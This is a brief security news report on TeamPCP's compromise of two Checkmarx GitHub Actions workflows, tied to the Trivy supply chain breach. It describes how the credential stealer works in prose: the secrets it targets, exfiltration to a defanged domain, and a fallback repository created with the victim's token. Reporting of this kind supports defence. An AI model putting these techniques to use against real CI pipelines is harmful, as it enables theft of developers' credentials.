TWO more GitHub Actions workflows operated by Checkmarx were compromised by a threat actor known as TeamPCP, who used stolen CI credentials to harvest secrets from CI runners. The affected workflows are checkmarx/ast-github-action and checkmarx/kics-github-action, both part of Checkmarx’s cloud security offerings.
Cloud security company Sysdig observed an identical credential stealer to the one used in the Trivy breach, with the attack unfolding about four days after the March 19, 2026 breach and linked to the CVE-2026-33634 (CVSS 9.4) tracked as the Trivy supply chain compromise.
The stealer, dubbed “TeamPCP Cloud stealer,” targets credentials and secrets for SSH keys, Git, AWS, Google Cloud, Microsoft Azure, Kubernetes, Docker, .env files, databases and VPNs, plus CI/CD configurations, and exfiltrates data to the domain checkmarx[.]zone in an encrypted archive named tpcp.tar[.]gz. The campaign also uses a fallback mechanism to create a docs-tpcp repository via the victim’s GITHUB_TOKEN to back up stolen data if exfiltration fails.